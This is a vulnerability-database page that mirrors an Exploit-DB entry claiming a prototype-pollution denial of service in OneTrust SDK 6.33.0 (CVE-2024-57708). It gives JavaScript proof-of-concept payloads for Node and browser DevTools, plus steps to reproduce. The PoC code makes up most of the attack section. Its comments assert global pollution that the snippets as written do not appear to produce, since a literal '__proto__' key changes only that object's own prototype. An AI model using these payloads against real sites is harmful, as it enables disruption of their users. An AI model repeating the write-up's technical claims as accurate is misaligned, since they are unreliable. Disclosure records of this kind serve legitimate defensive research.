Vulners
Lucene search
OneTrust SDK 6.33.0 - Denial Of Service (DoS)
๐๏ธย 26 Jun 2025ย 00:00:00Reported byย Alameen Karim MeraliTypeย 
ย exploitdb๐ย www.exploit-db.com๐ย 389ย Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2024-57708 | 25 Jun 202515:52 | โ | circl |
 | OneTrust SDK ๅฎๅ จๆผๆด | 25 Jun 202500:00 | โ | cnnvd |
 | CVE-2024-57708 | 25 Jun 202500:00 | โ | cve |
 | CVE-2024-57708 | 25 Jun 202500:00 | โ | cvelist |
 | EUVD-2024-54703 | 3 Oct 202520:07 | โ | euvd |
 | CVE-2024-57708 | 25 Jun 202516:15 | โ | nvd |
 | ๐ OneTrust SDK 6.33.0 Prototype Pollution / Denial of Service | 23 Jun 202500:00 | โ | packetstorm |
 | PT-2025-26840 ยท Onetrust ยท Onetrust Sdk | 25 Jun 202500:00 | โ | ptsecurity |
 | CVE-2024-57708 | 27 Jun 202500:16 | โ | redhatcve |
 | CVE-2024-57708 | 25 Jun 202500:00 | โ | vulnrichment |
10
- **Exploit Title**: OneTrust SDK 6.33.0 - Denial Of Service (DoS)
- **Date**: 01/01/2025
- **Exploit Author**: Alameen Karim Merali
- **Vendor Homepage**: [OneTrust JavaScript API](https://developer.onetrust.com/onetrust/docs/javascript-api)
- **Software Link**: [otBannerSdk.js v6.33.0](https://discord.com/assets/oneTrust/v4/scripttemplates/6.33.0/otBannerSdk.js)
- **Version**: 6.33.0
- **Tested on**: Kali Linux
- **CVE ID**: CVE-2024-57708
## Vulnerability Summary
A vulnerability exists in **OneTrust SDK v6.33.0** that allows an attacker to perform **Prototype Pollution** via the misuse of `Object.setPrototypeOf` and `Object.assign`. An attacker can inject malicious properties into the prototype chain, potentially causing **Denial of Service (DoS)** or altering the behavior of inherited objects throughout the application.
## Technical Details
The affected code includes prototype assignment logic such as:
```javascript
var o = function(e, t) {
return (o = Object.setPrototypeOf || { __proto__: [] } instanceof ...);
};
```
If the `t` argument (a user-supplied object) contains a `__proto__` or `constructor.prototype` reference, it can pollute `Object.prototype` globally.
## Proof-of-Concept (PoC)
```javascript
function testPrototypePollution() {
const maliciousPayload = {
"__proto__": {
polluted: "yes"
}
};
// Using vulnerable function 'o'
try {
o({}, maliciousPayload);
console.log("After o:", {}.polluted); // "yes"
} catch (e) {
console.error("Error testing o:", e);
}
// Using Object.assign
try {
Object.assign({}, maliciousPayload);
console.log("After Object.assign:", {}.polluted); // "yes"
} catch (e) {
console.error("Error testing Object.assign:", e);
}
// Cleanup
delete Object.prototype.polluted;
}
testPrototypePollution();
```
## Browser Console PoC (DevTools)
```javascript
var maliciousObj = { __proto__: { hacked: true } };
var newObj = Object.create(maliciousObj);
console.log(newObj.hacked); // true
```
Screenshot: [PoC Screenshot](https://ibb.co/B2hyYr5v)
## Steps to Reproduce
1. Save the PoC script above as `exploit.js`
2. Run using Node.js: `node exploit.js`
3. Observe polluted output (`{}.polluted === "yes"`)
4. Alternatively, run the payload in browser DevTools
## Impact
- Global object pollution
- Application logic errors
- Potential DoS
- Further exploitation depending on context
## Recommendation
Developers should upgrade to a patched version and sanitize any user input used in object merging or prototype manipulation.Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jun 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.15.7
EPSS0.00573
SSVC